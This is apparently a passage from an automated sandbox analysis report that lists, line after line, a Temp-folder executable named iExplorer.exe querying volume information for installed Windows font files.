                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
